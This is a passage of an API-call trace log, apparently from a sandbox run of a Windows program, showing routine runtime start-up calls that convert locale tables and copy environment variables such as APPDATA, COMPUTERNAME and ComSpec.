lpDestStr=0x0) returned 256 [0172.818] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0172.819] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1dü¦\x12äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0172.830] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0172.830] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0172.831] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0172.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0172.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1f) returned 0x63edd8 [0172.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x63edd8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0173.088] GetLastError () returned 0x0 [0173.088] SetLastError (dwErrCode=0x0) [0173.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x631ef0 [0173.088] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x631ef0) returned 0x4 [0173.088] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x631ef0, Size=0x8) returned 0x631ef0 [0173.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0173.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2b) returned 0x63b6f0 [0173.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x63b6f0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0173.088] GetLastError () returned 0x0 [0173.088] SetLastError (dwErrCode=0x0) [0173.088] GetLastError () returned 0x0 [0173.088] SetLastError (dwErrCode=0x0) [0173.088] GetLastError () returned 0x0 [0173.088] SetLastError (dwErrCode=0x0) [0173.141] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x631ef0) returned 0x8 [0173.141] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x631ef0, Size=0xc) returned 0x641fd0 [0173.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0173.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x37) returned 0x641010 [0173.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x641010, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0173.141] GetLastError () returned 0x0 [0173.141] SetLastError (dwErrCode=0x0) [0173.141] GetLastError () returned 0x0 [0173.142] SetLastError (dwErrCode=0x0) [0173.142] GetLastError () returned 0x0 [0173.142] SetLastError (dwErrCode=0x0) [0173.142] GetLastError () returned 0x0 [0173.142] SetLastError (dwErrCode=0x0) [0173.143] GetLastError () returned 0x0 [0173.143] SetLastError (dwErrCode=0x0) [0173.143] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641fd0) returned 0xc [0173.143] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641fd0, Size=0x10) returned 0x641fd0 [0173.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0173.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x6325d0 [0173.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6325d0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0173.143] GetLastError () returned 0x0 [0173.143] SetLastError (dwErrCode=0x0) [0173.143] GetLastError () returned 0x0 [0173.143] SetLastError (dwErrCode=0x0) [0173.143] GetLastError () returned 0x0 [0173.143] SetLastError (dwErrCode=0x0) [0173.143] GetLastError () returned 0x0 [0173.143] SetLastError (dwErrCode=0x0) [0173.143] GetLastError () returned 0x0 [0173.143] SetLastError (dwErrCode=0x0) [0173.144] GetLastError () returned 0x0 [0173.144] SetLastError (dwErrCode=0x0) [0173.144] GetLastError () returned 0x0 [0173.144] SetLastError (dwErrCode=0x0) [0173.144] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641fd0) returned 0x10 [0173.144] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641fd0, Size=0x14) returned 0x641050 [0173.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0173.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x31) returned 0x641070 [0173.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x641070, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0173.144] GetLastError () returned 0x0 [0173.144] SetLastError (dwErrCode=0x0) [0173.144] GetLastError () returned 0x0 [0173.144] SetLastError (dwErrCode=0x0) [0173.144] GetLastError () returned 0x0 [0173.144] SetLastError (dwErrCode=0x0) [0173.144] GetLastError () returned 0x0 [0173.144] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641050) returned 0x14 [0173.145] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641050, Size=0x18) returned 0x641050 [0173.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0173.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x6410b0 [0173.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x6410b0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.145] SetLastError (dwErrCode=0x0) [0173.145] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641050) returned 0x18 [0173.146] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641050, Size=0x1c) returned 0x6410d0 [0173.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0173.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63b050 [0173.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x63b050, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.146] GetLastError () returned 0x0 [0173.146] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.147] GetLastError () returned 0x0 [0173.147] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x1c [0173.148] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x20) returned 0x6410d0 [0173.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0173.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x14) returned 0x641050 [0173.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x641050, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.148] SetLastError (dwErrCode=0x0) [0173.148] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] GetLastError () returned 0x0 [0173.149] SetLastError (dwErrCode=0x0) [0173.149] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x20 [0173.149] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x24) returned 0x6410d0 [0173.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0173.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd) returned 0x633288 [0173.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x633288, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0173.149] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.150] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.150] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.150] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.150] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.150] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.150] GetLastError () returned 0x0 [0173.150] SetLastError (dwErrCode=0x0) [0173.151] GetLastError () returned 0x0 [0173.151] SetLastError (dwErrCode=0x0) [0173.151] GetLastError () returned 0x0 [0173.151] SetLastError (dwErrCode=0x0) [0173.151] GetLastError () returned 0x0 [0173.151] SetLastError (dwErrCode=0x0) [0173.151] GetLastError () returned 0x0 [0173.151] SetLastError (dwErrCode=0x0) [0173.151] GetLastError () returned 0x0 [0173.153] SetLastError (dwErrCode=0x0) [0173.153] GetLastError () returned 0x0 [0173.153] SetLastError (dwErrCode=0x0) [0173.153] GetLastError () returned 0x0 [0173.153] SetLastError (dwErrCode=0x0) [0173.153] GetLastError () returned 0x0 [0173.153] SetLastError (dwErrCode=0x0) [0173.153] GetLastError () returned 0x0 [0173.153] SetLastError (dwErrCode=0x0) [0173.153] GetLastError () returned 0x0 [0173.153] SetLastError (dwErrCode=0x0) [0173.153] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x24 [0173.153] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x28) returned 0x6410d0 [0173.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0173.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x63ee00 [0173.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x63ee00, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.154] GetLastError () returned 0x0 [0173.154] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.155] GetLastError () returned 0x0 [0173.155] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x28 [0173.156] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x2c) returned 0x6410d0 [0173.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0173.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63b728 [0173.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x63b728, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.156] SetLastError (dwErrCode=0x0) [0173.156] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.157] SetLastError (dwErrCode=0x0) [0173.157] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6410d0) returned 0x2c [0173.158] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6410d0, Size=0x30) returned 0x6410d0 [0173.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0173.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x19) returned 0x63ee28 [0173.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x63ee28, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.158] SetLastError (dwErrCode=0x0) [0173.158] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) [0173.159] GetLastError () returned 0x0 [0173.159] SetLastError (dwErrCode=0x0) 